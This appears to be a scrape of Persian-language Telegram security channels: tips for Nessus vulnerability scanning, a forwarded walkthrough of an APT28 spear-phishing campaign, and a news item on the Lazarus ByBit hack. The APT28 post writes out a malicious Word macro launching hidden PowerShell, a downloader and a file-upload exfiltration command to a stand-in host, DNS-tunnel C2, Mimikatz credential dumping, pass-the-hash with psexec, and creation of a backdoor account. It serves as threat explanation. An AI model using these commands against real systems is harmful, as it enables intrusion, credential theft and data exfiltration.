1-اگه روی virtual machine اسکن اسیب پذیری با نرم افزار نسوس رو انجام میدیم حتما باید درحال bridged قرارش بدین به دلیل اینکه زمانی که روی host-only قرارش میدن امکانش هست که فایروال یکسری پورت هارو ببنده و برای اسکن بهتر این گزینه رو روی های bridged قرار بدین
2-اصلا نباید هیچ نرم افزار امنیتی روی virtual machine و os اصلیتون فعال باشه نرم افزار های مثل انتی ویروس و فایروال و... جلوی اسکن رو بخاطر شرایطامنیتی میگیرن و خروجی خوبی دریافت نخاهید کرد
3-نرم افزار نسوس میاد سرور های مارو از zone های مختلف اسکن میکنه اگه در ورودی فایروال ، ips و تجهیزات های امنیتی دیگه ای وجود داشته باشه جلوی اسکن رو میگرن باید داخل این تجهیزات رول بنویسیم که از سورس نسوس به تمامی سرویس ها و سیستم عامل های شبکمون ارتباط داشته باشه و حتی داخل نرم افزار انتی ویروس باید نرم افزار نسوس رو داخل white list قرارش بدیم
4-حتما در قسمت policy تب credentials یوزنیم و پسورد هر سیستم عامل رو بدین برای اسکن کامل و دقیق تر و اکه قصد دارین سرویس خاستی رو بهتر اسکن کنید از همین تب یوزر نیم و پسورد اون سرویس رو بدین چون درحالت عادی این اتفاق نمیفته و بیشتر روی خود سیستم عامل اسکن رو انجام میده
------- ودرآخر حتما بعد از اسکن رول هایی که نوشتید رو پاک کنید و درزمان استفاده دوباره رول بنویسید ------
@sec_netw🕷
❤3
Forwarded from Cyber Warfar
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر میرسیده از طرف یه سازمان بینالمللی معتبر مثل EU External Action Service (EEAS) باشه.
فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده میکرده. بعد از باز شدن فایل، ماکرو فعال میشده و PowerShell رو برای دانلود بدافزار اجرا میکرده:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاریشده بوده؛ بدافزار اصلی رو دانلود میکرده:
$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path
ویژگیهای بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه ویندوز، یوزرنیم، پردازنده) رو جمعآوری میکنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زدهشده (Keylogging)
- آپلود و دانلود فایلهای مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2
ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ریکوئستهای DNS برای ارسال اطلاعات به سرور C2 استفاده میکنه:
nslookup -type=TXT x7c9.malicious-domain.com
دیتاها به صورت Base64 یا XOR Encoding انکریپت شدهان.
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هشهای رمزعبور استفاده کرده:
privilege::debug
sekurlsa::logonpasswords
دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستمها
اعضای APT28 با استفاده از هشها به سیستمهای دیگه متصل میشدن:
psexec \\target-system -u administrator -p NTLMHASH cmd.exe
سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده میشده:
Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"
ارسال دیتاهای سرقتشده با پاورشل
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytesاعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
Forwarded from Nova Group
❌ گروه Lazarus پشت حمله هکری دیروز به ByBit !
🔻اکنون این گروه هکری کره شمالی حتی از خود سازنده اتریوم، ویتالیک، ثروتمند تر است.
🆘 این حمله به روشی پیچیده انجام شده که شامل دستکاری در تراکنشها و احتمالاً سوءاستفاده از فرآیند امضای چندگانه (multisig) بوده است به شرح زیر میباشد :
1. UI Spoofing:
2. Sybil-like Attack:
🌐https://www.bloomberg.com/news/articles/2025-02-21/bybit-hack
⭐️ @Nova_Groups_tech
🔻اکنون این گروه هکری کره شمالی حتی از خود سازنده اتریوم، ویتالیک، ثروتمند تر است.
🆘 این حمله به روشی پیچیده انجام شده که شامل دستکاری در تراکنشها و احتمالاً سوءاستفاده از فرآیند امضای چندگانه (multisig) بوده است به شرح زیر میباشد :
1. UI Spoofing:
حمله ممکن است از طریق "UI Spoofing" انجام شده باشد. این تکنیک شامل فریب دادن سیستم یا اپراتورها با نمایش اطلاعات جعلی در رابط کاربری است. در این سناریو، هکرها ممکن است رابط کاربری مربوط به تأیید تراکنش را دستکاری کرده باشند تا تراکنش مخرب به نظر قانونی بیاید و توسط سیستم یا اپراتور تأیید شود.
2. Sybil-like Attack:
هکرها ممکن است یک تراکنش جعلی یا شبیهسازیشده ایجاد کرده باشند که با امضاهای قانونی اشتباه گرفته شود. در حملات سیبیل، مهاجم هویتهای جعلی متعددی ایجاد میکند تا سیستم را فریب دهد. در اینجا، ممکن است هکرها توانسته باشند امضاهای چندگانه مورد نیاز برای تأیید تراکنش را جعل یا دستکاری کنند
🌐https://www.bloomberg.com/news/articles/2025-02-21/bybit-hack
⭐️ @Nova_Groups_tech
🔥4